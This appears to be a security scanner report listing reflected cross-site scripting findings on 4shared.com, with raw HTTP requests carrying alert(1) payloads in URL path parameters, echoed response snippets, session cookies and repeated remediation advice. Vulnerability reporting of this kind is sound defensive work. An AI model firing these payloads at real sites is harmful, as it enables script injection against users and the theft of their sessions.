GET /icons/16x1634cc4"-alert(1)-"8ad53ce0672/ HTTP/1.1 Host: www.4shared.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:null--> <title>4shared.co ...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://www.4shared.com/icons/16x1634cc4"-alert(1)-"8ad53ce0672/"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() { var win ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4cedc"-alert(1)-"98d34b98a53 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:http://www.4shared.com/-->
...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://www.4shared.com/images4cedc"-alert(1)-"98d34b98a53/blueBanner_plus.gif"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedbac ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aef3a"-alert(1)-"93d664da704 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:http://www.4shared.com/-->
...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://www.4shared.com/images/blueBanner_plus.gifaef3a"-alert(1)-"93d664da704"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() { var wind ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8493f"-alert(1)-"1139657276e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:http://www.4shared.com/-->
...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://www.4shared.com/images8493f"-alert(1)-"1139657276e/index-premium-features.png"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15de3"-alert(1)-"eb019ce0128 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:http://www.4shared.com/-->
...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://www.4shared.com/images/index-premium-features.png15de3"-alert(1)-"eb019ce0128"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() { var wind ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d78a"-alert(1)-"1ddd3f867cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:http://www.4shared.com/-->
...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://www.4shared.com/images3d78a"-alert(1)-"1ddd3f867cb/spacer.gif"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() {
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce9c3"-alert(1)-"bd60f50799e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:http://www.4shared.com/-->
...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://www.4shared.com/images/spacer.gifce9c3"-alert(1)-"bd60f50799e"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() { var wind ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e191f"-alert(1)-"6e354f00eec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.jspe191f"-alert(1)-"6e354f00eec HTTP/1.1 Host: www.4shared.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:null--> <title>4shared.co ...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://www.4shared.com/index.jspe191f"-alert(1)-"6e354f00eec"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() { var wind ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab098"-alert(1)-"8cd6f08d9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload efa86"-alert(1)-"df4c1953dcc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:null--> <title>4shared.co ...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://www.4shared.com/js/index.jsefa86"-alert(1)-"df4c1953dcc"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() { var wind ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55f12"-alert(1)-"f7aecd99122 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de174"-alert(1)-"725a9c623ce was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:null--> <title>4shared.co ...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://www.4shared.com/js/loginScript.jspde174"-alert(1)-"725a9c623ce"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() { var wind ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe0b9"-alert(1)-"c10b6d0808b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8cd94"-alert(1)-"07633452741 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:null--> <title>4shared.co ...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://www.4shared.com/js/signup-script.jsp8cd94"-alert(1)-"07633452741"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() { var wind ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15fe3"-alert(1)-"13719462e8f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /loginBox.jsp15fe3"-alert(1)-"13719462e8f HTTP/1.1 Host: www.4shared.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:null--> <title>4shared.co ...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://www.4shared.com/loginBox.jsp15fe3"-alert(1)-"13719462e8f"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() { var wind ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9395b"-alert(1)-"96bc668bd2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /m9395b"-alert(1)-"96bc668bd2/android.jsp HTTP/1.1 Host: www.4shared.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ed12"-alert(1)-"ff9a528e7d7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /m/android.jsp4ed12"-alert(1)-"ff9a528e7d7 HTTP/1.1 Host: www.4shared.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:null--> <title>4shared.co ...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://www.4shared.com/m/android.jsp4ed12"-alert(1)-"ff9a528e7d7"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() { var wind ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c39b"-alert(1)-"ba8c575a95c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /m2c39b"-alert(1)-"ba8c575a95c/blackberry.jsp HTTP/1.1 Host: www.4shared.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 69a6b"-alert(1)-"80db2a41027 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /m/blackberry.jsp69a6b"-alert(1)-"80db2a41027 HTTP/1.1 Host: www.4shared.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:null--> <title>4shared.co ...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://www.4shared.com/m/blackberry.jsp69a6b"-alert(1)-"80db2a41027"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() { var wind ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f6ba5"-alert(1)-"f2530800432 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mf6ba5"-alert(1)-"f2530800432/symbian.jsp HTTP/1.1 Host: www.4shared.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50ceb"-alert(1)-"9c67985142f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /m/symbian.jsp50ceb"-alert(1)-"9c67985142f HTTP/1.1 Host: www.4shared.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:null--> <title>4shared.co ...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://www.4shared.com/m/symbian.jsp50ceb"-alert(1)-"9c67985142f"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() { var wind ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39736"-alert(1)-"1ec01b6de0e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /main39736"-alert(1)-"1ec01b6de0e/translate/setLang.jsp HTTP/1.1 Host: www.4shared.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11c9c"-alert(1)-"b3e63033d79 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /main/translate11c9c"-alert(1)-"b3e63033d79/setLang.jsp HTTP/1.1 Host: www.4shared.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77fc0"-alert(1)-"030cd898f55 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
